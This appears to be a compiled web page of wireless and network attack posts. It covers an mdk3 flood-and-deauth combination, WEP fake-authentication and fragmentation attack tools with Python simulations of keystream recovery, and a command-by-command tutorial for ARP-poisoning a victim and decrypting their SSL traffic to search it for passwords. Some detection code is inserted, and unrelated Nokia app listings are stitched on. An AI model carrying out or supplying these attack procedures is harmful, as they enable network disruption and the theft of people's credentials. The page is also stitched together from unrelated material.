Mdk3 Secret Destruction Mode
It's a combination of different attacks.
Cisco still has a bunch of support tickets open because of it.
Their Intrusion Detection System crashed because of this special attack, and along with the IDS, the routing tables of the whole university got mixed up for about half an hour.
So, TRY THIS AT HOME, but not anywhere else.
The combination is:
- Run beacon flood mode to generate fake APs with the same SSID as the victim's AP
- Auth-DoS the original AP with intelligent mode
- Use amok mode to kick the clients
And for the next version of mdk3:
- Use the upcoming WIDS confusion mode to cross-connect kicked clients to real and fake APs, making all security systems go FUBAR.
In this 802.11 hell, nobody should be able to access the network, because:
-> They get kicked as soon as they connect (amok mode)
-> They see thousands of APs and cannot tell which one is the real one, so they just try around blindly (beacon flood)
-> The original AP may be too busy to handle the real clients because of the auth DoS
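What the three mdk3 modes put on the air, as an added example that is not part of mdk3 or of this post: it builds the management frames a beacon flood and an amok-mode deauth consist of (a beacon carrying a cloned SSID, a deauthentication carrying a reason code), parses them back, and applies the two heuristics a WIDS uses against exactly this combination: one SSID advertised by many BSSIDs, and the peak deauth rate per second. The SSID, MAC addresses and timings are constructed; nothing is transmitted.

```python
import struct
from collections import defaultdict

BROADCAST = b"\xff" * 6
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mgmt_header(subtype, dst, src, bssid, seq):
    # Frame Control: type 0 (management), subtype in bits 4-7, no flags;
    # then duration, addr1 (dst), addr2 (src), addr3 (bssid), sequence control
    return struct.pack("<HH", subtype << 4, 0) + dst + src + bssid + struct.pack("<H", seq << 4)


def beacon(ssid, bssid, channel, seq=0):
    # fixed fields: timestamp, beacon interval (100 TU), capability = ESS | Privacy
    fixed = struct.pack("<QHH", 0, 100, 0x0011)
    ies = bytes([0, len(ssid)]) + ssid.encode()            # SSID element
    ies += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])           # basic rates 1/2/5.5/11 Mbit
    ies += bytes([3, 1, channel])                           # DS parameter set
    return mgmt_header(SUBTYPE_BEACON, BROADCAST, bssid, bssid, seq) + fixed + ies


def deauth(client, bssid, seq=0, reason=7):
    # reason 7 (class 3 frame from a non-associated station) is a common choice in forged deauths
    return mgmt_header(SUBTYPE_DEAUTH, client, bssid, bssid, seq) + struct.pack("<H", reason)


def parse(frame):
    fc, = struct.unpack_from("<H", frame, 0)
    info = {"type": (fc >> 2) & 3, "subtype": (fc >> 4) & 0xF,
            "dst": frame[4:10], "src": frame[10:16], "bssid": frame[16:22]}
    body = frame[24:]
    if info["type"] == 0 and info["subtype"] == SUBTYPE_BEACON:
        pos = 12                                            # skip the fixed fields
        while pos + 2 <= len(body):
            eid, ln = body[pos], body[pos + 1]
            val = body[pos + 2:pos + 2 + ln]
            if eid == 0:
                info["ssid"] = val.decode(errors="replace")
            elif eid == 3 and ln == 1:
                info["channel"] = val[0]
            pos += 2 + ln
    elif info["type"] == 0 and info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"], = struct.unpack_from("<H", body, 0)
    return info


def bssids_per_ssid(frames):
    """Beacon flood signature: one SSID advertised by many different BSSIDs."""
    seen = defaultdict(set)
    for f in frames:
        p = parse(f)
        if "ssid" in p:
            seen[p["ssid"]].add(p["bssid"])
    return {ssid: len(b) for ssid, b in seen.items()}


def max_deauth_rate(timed_frames, window_ms=1000):
    """Amok signature: peak number of deauth frames in any window_ms window."""
    times = sorted(t for t, f in timed_frames if "reason" in parse(f))
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window_ms:
            start += 1
        best = max(best, end - start + 1)
    return best


def demo():
    ssid, real_bssid = "CampusWLAN", mac("00:11:22:33:44:55")   # constructed
    # 50 cloned beacons from locally administered BSSIDs, plus the real AP
    flood = [beacon(ssid, bytes([0x02, 0, 0, 0, 0, i]), 6, seq=i) for i in range(1, 51)]
    flood.append(beacon(ssid, real_bssid, 6))
    # 200 deauths against one client, 10 ms apart: (time in ms, frame)
    client = mac("aa:bb:cc:dd:ee:01")
    amok = [(i * 10, deauth(client, real_bssid, seq=i)) for i in range(200)]
    return bssids_per_ssid(flood)[ssid], max_deauth_rate(amok)


if __name__ == "__main__":
    clones, rate = demo()
    print(f"{clones} BSSIDs advertise the same SSID; peak {rate} deauth frames per second")
```

The two counters are what an IDS keys on; the crash described above shows the other side of that coin, a sensor that cannot cope with the volume. A sensor should cap per-SSID and per-BSSID state so that a flood degrades detection rather than the sensor itself.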
Fake Shared Key Authentication
This is the world's first fully functional code to enable fake authentication on networks using Shared Key Authentication. You do NOT need to know the key to authenticate; all you need is a keystream that has been recovered with aireplay-ng's chopchop attack. The keystream must be at least as long as the encrypted challenge response (140 bytes for the standard 128-byte challenge: 6 bytes of auth header, a 130-byte challenge element and the 4-byte ICV). Hirte, another developer from the aircrack-ng community, has successfully included this code in the aircrack suite.
Fixed in Version 0.2:
- Show error when network does not use Shared Key Authentication
- Get Capability Field from Beacon Frame. (Using the standard capabilities failed for some APs)
ska-0.2.tar.bz2
ska-0.1.tar.bz2
Fragmentation Attack
And another world premiere from me: the first implementation of the Fragmentation Attack on Linux. This attack needs a driver and card that handle IEEE 802.11 fragmentation correctly; your driver may not work or may need to be updated or modified. The output of this tool is a file in the aircrack-ng keystream format (.xor), which can be used in the same way as the output of aireplay-ng's chopchop attack. With that keystream you can build an ARP packet (with arpforge-ng, or with packetforge-ng in the 0.6.2 release). Injecting this packet into the target wifi network provokes replies that increase the IV count. For an example attack, see the README in the tarball. afrag has already been integrated into aireplay-ng; the best idea is to get the aircrack-ng SVN version for the newest fragmentation attack code.
afrag-0.1.tar.bz2
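Both attacks above rest on the same WEP weakness: a keystream (PRGA) recovered for one IV can be reused with that IV as often as you like, because WEP neither forbids IV reuse nor protects the ICV with anything stronger than CRC-32. The following added example is not code from ska, afrag or aircrack-ng; it simulates both sides with a constructed 40-bit key that only the "AP" functions ever see. The attacker recovers 8 PRGA bytes from the fixed LLC/SNAP header of any IP frame, grows them past a kilobyte through two rounds of fragment relaying (the core of the fragmentation attack), and then answers a Shared Key Authentication challenge with that keystream, which is what the fake-SKA code does with a chopchop keystream. Fragment reassembly and relaying by the AP are simplified as noted in the comments.

```python
import struct
import zlib

LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")   # first 8 plaintext bytes of any IPv4 frame


def rc4(key, n):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):                       # WEP integrity check value: CRC-32, little-endian
    return struct.pack("<I", zlib.crc32(data))


# --- AP side: the only code that ever touches the key -----------------------
def wep_encrypt(key, iv, payload):
    body = payload + icv(payload)
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))   # IV, key index, ciphertext


def wep_decrypt(key, frame):
    iv, ct = frame[:3], frame[4:]
    body = xor(ct, rc4(iv + key, len(ct)))
    payload = body[:-4]
    return payload if body[-4:] == icv(payload) else None


def ap_reassemble_and_relay(key, frags, relay_iv):
    """Decrypt and ICV-check each fragment, reassemble, forward under a fresh IV.
    Simplification: a real AP reassembles by fragment number and only relays
    frames addressed to a reachable (e.g. broadcast) destination."""
    parts = [wep_decrypt(key, f) for f in frags]
    return None if None in parts else wep_encrypt(key, relay_iv, b"".join(parts))


def ap_verify_ska(key, challenge, response):
    body = wep_decrypt(key, response)
    expected = struct.pack("<HHH", 1, 3, 0) + bytes([16, len(challenge)]) + challenge
    return body == expected


# --- attacker side: uses only captured frames, an IV and its PRGA -----------
def recover_prga(frame, known_plaintext):
    """Ciphertext XOR known plaintext = keystream (PRGA) for that frame's IV."""
    return frame[:3], xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def build_fragments(iv, prga, payload):
    """Each fragment carries len(prga)-4 data bytes plus a 4-byte ICV, all
    encrypted with the same IV and PRGA; 802.11 allows at most 16 fragments."""
    chunk = len(prga) - 4
    frags = []
    for i in range(0, len(payload), chunk):
        body = payload[i:i + chunk] + icv(payload[i:i + chunk])
        frags.append(iv + b"\x00" + xor(body, prga))
    assert len(frags) <= 16
    return frags


def forge_ska_response(iv, prga, challenge):
    """Auth frame seq 3: algorithm 1 (shared key), sequence 3, status 0, challenge IE (id 16)."""
    body = struct.pack("<HHH", 1, 3, 0) + bytes([16, len(challenge)]) + challenge
    body += icv(body)
    assert len(prga) >= len(body), "need 140 PRGA bytes for a 128-byte challenge"
    return iv + b"\x00" + xor(body, prga)


def demo(key=b"\x01\x02\x03\x04\x05"):   # constructed 40-bit key, known only to the AP side
    # 1. capture any IP frame; its first 8 plaintext bytes are the fixed LLC/SNAP header
    captured = wep_encrypt(key, b"\x10\x20\x30", LLC_SNAP_IP + b"\x45\x00" + b"\x00" * 30)
    iv, prga = recover_prga(captured, LLC_SNAP_IP)
    lengths = [len(prga)]
    relay_iv = 0x112233
    # 2. grow the keystream: 16 fragments become one relayed frame whose plaintext we chose
    while len(prga) < 140:
        payload = LLC_SNAP_IP + b"\x00" * ((len(prga) - 4) * 16 - 8)
        relay_iv += 1
        relayed = ap_reassemble_and_relay(key, build_fragments(iv, prga, payload),
                                          relay_iv.to_bytes(3, "big"))
        iv, prga = recover_prga(relayed, payload + icv(payload))
        lengths.append(len(prga))
    # 3. answer a Shared Key Authentication challenge with that keystream, no key needed
    challenge = bytes(range(128))          # constructed stand-in for the AP's seq-2 challenge
    ok = ap_verify_ska(key, challenge, forge_ska_response(iv, prga, challenge))
    return lengths, ok


if __name__ == "__main__":
    print(demo())     # ([8, 68, 1028], True)
```

Eight bytes become 68 after the first relay (64 data bytes plus the ICV) and 1028 after the second, which is more than the 140 an SKA response needs; a third round would reach the 1500 bytes afrag's .xor files hold. The forged response passes because the AP checks only the ICV and the challenge text, neither of which depends on the attacker knowing the key.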
Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.
The first thing is to get fragrouter. I don't know if you can use other tools provided with BackTrack; there are 100 ways to skin a cat and this is just my way.
http://packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html
There are lots of things that you can do with fragrouter, but we are going to use it to set up IP forwarding.
We do this with this command:
Code:
fragrouter -B1
Squash that window and put it to one side. Now open another shell and we will start dnsspoof with this command:
Code:
dnsspoof -i ath0
(replace ath0 with whatever network interface you are using)
Again, put that window to one side and let's load up webmitm. Webmitm will present our own SSL certificate to the victim so we can decrypt the traffic we capture. That certificate is self-signed, so the victim's browser will show a certificate warning; the attack only works if they click through it.
Start webmitm by typing
Code:
webmitm -d
Now we can start the ARP spoof. To start ettercap type
Code:
ettercap -T -M arp:remote /router addy/ /victim addy/
Ok, now we are rolling. The next thing is to sniff the traffic. There are a few things you can do now, like using ettercap filters and adding URLs from Metasploit (maybe next tut), and lots of other things. But we are interested in the SSL traffic, so I use Wireshark to save the data into a .cap file.
You can find wireshark in Backtrack >>> Privilege Escalation >>> Sniffers.
Now that Wireshark is loaded, let's start capturing packets. Go to Capture >>> Options, select the network card you are using and then hit Start.
You should now be capturing the packets addressed to your victim's address. Once you have captured enough, stop Wireshark and save the data to your root directory.
Now to decrypt the SSL data.
You should first download ssldump:
http://www.rtfm.com/ssldump/
ssldump is going to decrypt our sniffed SSL data using the private key of the fake certificate we issued to the victim (webmitm.crt holds both the key and the certificate). This works only because our webmitm is the server the victim talked to, and only for RSA key exchange, where the session key is wrapped with the server's RSA key. We do this by opening up a shell and typing:
Code:
ssldump -r your.cap -k webmitm.crt -d > out
And you are done: all the SSL data will be saved to a file called out in your root directory. Use whatever you like to search it for passwords etc.
by Dr_GrEeN
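The ettercap step works by sending ARP replies that neither the victim nor the router asked for, and any host or sensor on the LAN can see that. The following is an added example, not part of Dr_GrEeN's tutorial or of any of the tools it uses: an arpwatch-style tracker that parses Ethernet/ARP frames and flags unsolicited replies, a sender hardware address that does not match the frame's Ethernet source, and an IP address that changes its MAC. The addresses and the frame sequence are constructed to mirror what `-M arp:remote` produces.

```python
import struct
from ipaddress import IPv4Address

ETHERTYPE_ARP = b"\x08\x06"
ARP_REQUEST, ARP_REPLY = 1, 2


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def fmt(m):
    return ":".join(f"{b:02x}" for b in m)


def arp_frame(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Ethernet II header followed by an ARP packet (hardware type 1, protocol IPv4)."""
    eth = eth_dst + eth_src + ETHERTYPE_ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + IPv4Address(spa).packed
           + tha + IPv4Address(tpa).packed)
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        return None
    op, = struct.unpack_from("!H", frame, 20)
    return {"eth_src": frame[6:12], "op": op,
            "sha": frame[22:28], "spa": str(IPv4Address(frame[28:32])),
            "tha": frame[32:38], "tpa": str(IPv4Address(frame[38:42]))}


class ArpWatch:
    """Tracks IP->MAC bindings and flags what ARP poisoning produces: replies
    nobody asked for, and a known IP suddenly answering from a new MAC."""

    def __init__(self):
        self.bindings = {}      # ip -> mac last seen claiming it
        self.pending = set()    # (requester ip, requested ip) awaiting a reply

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return []
        alerts = []
        if a["op"] == ARP_REQUEST:
            self.pending.add((a["spa"], a["tpa"]))
        elif a["op"] == ARP_REPLY:
            if (a["tpa"], a["spa"]) in self.pending:
                self.pending.discard((a["tpa"], a["spa"]))
            else:
                alerts.append(f"unsolicited reply: {a['spa']} is-at {fmt(a['sha'])}")
        if a["sha"] != a["eth_src"]:
            alerts.append(f"sender MAC {fmt(a['sha'])} != frame source {fmt(a['eth_src'])}")
        old = self.bindings.get(a["spa"])
        if old is not None and old != a["sha"]:
            alerts.append(f"{a['spa']} changed from {fmt(old)} to {fmt(a['sha'])}")
        self.bindings[a["spa"]] = a["sha"]
        return alerts


def demo():
    # constructed LAN: a router, a victim and the attacking BackTrack box
    gw_ip, victim_ip = "192.168.1.1", "192.168.1.50"
    gw, victim = mac("00:11:22:aa:bb:01"), mac("00:11:22:aa:bb:50")
    attacker = mac("de:ad:be:ef:00:01")
    zero, bcast = b"\x00" * 6, b"\xff" * 6
    frames = [
        # normal resolution: the victim asks for the gateway, the gateway answers
        arp_frame(victim, bcast, ARP_REQUEST, victim, victim_ip, zero, gw_ip),
        arp_frame(gw, victim, ARP_REPLY, gw, gw_ip, victim, victim_ip),
        # arp:remote poisoning: the attacker tells the victim it is the gateway
        # and tells the gateway it is the victim, with no request outstanding
        arp_frame(attacker, victim, ARP_REPLY, attacker, gw_ip, victim, victim_ip),
        arp_frame(attacker, gw, ARP_REPLY, attacker, victim_ip, gw, gw_ip),
    ]
    watch = ArpWatch()
    return [watch.observe(f) for f in frames]


if __name__ == "__main__":
    for i, alerts in enumerate(demo(), 1):
        print(f"frame {i}: {alerts or 'ok'}")
```

The first two frames pass silently; each poisoning frame raises two alerts, the unsolicited reply and the binding change. Static ARP entries for the gateway on the victim, or dynamic ARP inspection on the switch, stop the redirect outright; the certificate warning in the victim's browser is the last line of defence and should not be clicked through.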
ssldump
ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
ssldump 0.9b3
The current version is 0.9b3.
ssldump 0.9b3 contains a number of fixes and enhancements over 0.9b2, including:
- Security fix: some potential overflows and underflows
- Added support for VLANs
- Added -P flag to disable promiscuous mode
- Fixed bugs in the TCP reassembly code
- A lot of bug fixes
Nokia Energy Profiler 1.1
Nokia Energy Profiler is a stand-alone test and measurement application for S60 3rd Edition, Feature Pack 1 devices (and onwards). The application allows developers to test and monitor their application’s energy usage in real time in the target device.
The application is available as a SIS package for S60 3rd Edition devices, but measurement works only in S60 3rd Edition, Feature Pack 1 (or newer). Older devices can still view files.
This view shows the cellular signal levels as RX and TX levels. RX level corresponds to the power of the received cellular signal. TX level refers to the transmission power of the cellular radio. Both measures are in dBm. TX levels show up only during active transmission periods (voice or data). RX levels are available whenever the phone is connected to a cellular network, which means there is no RX level in the Offline profile. Average/instant bar values are for the selected signal, which is shown in the corner indicator. You can toggle the chosen signal with the [6] key. Unlike all the other views, the zero of the y-axis is at the bottom of the screen. RX levels are typically between -30 and -120 dBm (a lower value means a poorer signal), whereas TX levels are positive dBm (a higher value means more power).
FTD FieldTest NetMonitor S60v3 SymbianOS9.1/9.2
Description:
FTD is a net-monitoring application for mobile devices that exposes the phone's view of the mobile network.
Full GSM signaling, as visible to the network operator:
Information on the serving cell:
- Hopping, channel carrier number, RX level, TX power levels, RX quality, time slot, timing advance, radio link timeout, C1, C2, currently used band, type of current channel...
Information on the 1st, 2nd, 3rd, 4th, 5th, 6th, 7th, 8th neighbours.
Network selection display.
System information bits for the service cell.
Paging repeat period, TMSI, periodic location update.
Network parameters.
Ciphering, hopping, DTX status and IMSI.
Uplink DTX switching display.
BTS-TEST carrier: lock / unlock on one BTS frequency.
Toggle cell barred status.
Select which band to use: GSM 900 - GSM 1800 - GSM 1900
Full GPRS signaling displays:
Information on the current GPRS state and previous TBF configuration:
- Hopping, channel carrier number, RX level, timing advance, downlink time slot, uplink time slot, channel coding scheme downlink/uplink, timing advance index, TFI and MAC mode for TBF config, type of current channel, UFS values...
Previous UL TBF establishment.
Information on the GMM state.
Values of P-TMSI, RAC, SMS radio priority, Ciphering and Non-DRX parameters.
GPRS Network parameters.
Packet control channel parameters.
Packet system information parameters.
GPRS information on the serving cell and neighbors.
And many more...
Installation notes:
Copy/Move
FtdApp_reg.rsc to C:/Private/10003a3f/import/Apps
Copy/Move
Ftd.mbm, Ftd.mif, ftd.rsc, Ftd_aif.mif, ftdata_wk15_07.dat, ftdata_wk41_06.dat, Alarm.rsc, AlarmList.mbm, CallEnd.rsc, Custom.rsc to C:/Resource/Apps
Copy/Move
ftd.dll55l to C:/Resource/Plugins
Copy/Move
FTD.exe, FtDaInterface.dll, ftdaserver.exe, FtDbInterface.dll, ftdbserver.exe, FtdGwcTest.exe, FtEngine.dll to C:/Sys/Bin
For application icon in SymbianOS 9.1 use the file in attachment.
Tested on
N73, N95, N95 8GB, 6120c, 6290, 5700, E65, E51, E90.
Compatibility:
Should work on all S60v3 devices
JoikuSpot Light v2.1 Beta S60v3 SymbianOS [Updated - 31st July '08]
JoikuSpot is a FREE and SECURE Mobile HotSpot solution that turns Nokia phones into a WLAN HotSpot.
JoikuSpot software is installed directly on the phone. When switched on, laptops and iPods can establish an instant, secure and fast WLAN connection via the smartphone's JoikuSpot HotSpot, using the phone's own 3G internet connection.
Multiple devices can connect to JoikuSpot in parallel and seamlessly share the same 3G internet connection.
You can use JoikuSpot to access internet e.g. on the train, car, sailing boat, summer cottage, hotel, while walking, or when at remote office...where ever you are!
Release notes for JoikuSpot Light:
-Landing page works with all operators
-Encryption support with WEP, including a 128-bit key generator (note that WEP only deters casual eavesdropping; the chopchop and fragmentation attacks described earlier on this page recover its keystream in minutes)
-Battery threshold shutting down the client when battery level is too low
-Default Access point setting
-Support for secure SSH tunnels with Putty
-MapSpot 1.0 support for GPS HotSpot location identification with external mapping services such as Google Maps
All settings can be adjusted after JoikuSpot is stopped, just press the Stop key.
Please uninstall the previous version before updating your JoikuSpot. Just go Tools --> Application management on your Nokia phone.
JoikuSpot works with Nokia S60 3rd Ed phones. For Windows Mobile version, please download WMWifiRouter.
JoikuSpot requires that you have a working Internet connection in the phone. WAP connection sharing is NOT supported.
Please make sure that you have the latest firmware on the phone. You can easily update it with Nokia Software Updater.
JoikuSpot Light supports HTTP and HTTPS protocols. This means that you can browse web and also secure sites (webmails, banks). HTTPS requires that "Automatic proxy configuration" is set on your web browser. See User guide for easy setup.
Other protocols such as IMAP (mail) or FTP are not part of Light Edition. We will soon launch a commercial Premium Edition with full protocol support. Light Edition will continue to stay free.
HTTPS settings for the Apple iPod touch (iTouch):
Go to Settings --> Wi-Fi and select the JoikuSpot network. Go to the bottom and set HTTP proxy to Auto. TIP for some phone model and iPod touch combinations:
Try the auto configuration URL http://192.168.2.1/wpad.dat, or set the HTTPS proxy to 192.168.2.1 port 80
Known issues:
-JoikuSpot has been tested successfully with several laptops: Fujitsu-Siemens, Apple Macbook, Dell, HP and new IBM models seem to work well. Older laptops might have an issue with the WLAN chipset.
-PSP and Nintendo DS require WLAN infrastructure mode and Symbian does not support it yet. We are looking into it and discussing with Symbian.
-If you have firewall program installed in your smartphone (F-Secure Mobile Security e.g.), try lowering the security level. We shall do a fix for this to final version.
-Some operators (at least in the UK) require that you go to their store and prove that you are over 18 in order to browse the web. Otherwise you will be limited to their own sites. This is not a bug in JoikuSpot, it also applies to all web surfing. Try accessing the web through 3G first with the phone's web browser to see if your access is limited.
Countermeasures by FTE against copying their Bluetooth sniffer
FTE is finally reacting to the fact that you can easily copy their ComProbe firmware to other, regular Bluetooth USB dongles. First, with the new hardware they released earlier this year, the structure of the firmware has also changed, so the newer firmware won't work out of the box the good old way.
Second, they seem to have changed their licensing policy. You have to register your software (with your license key) with FTE4BTonline. And, that's the funny thing, it seems that you also have to 'de-register' your software online. That means: when you want to install your software somewhere else, uninstall it on the other PC and 'de-register' it online, then install it on the other PC.
source: http://www.evilgenius.de/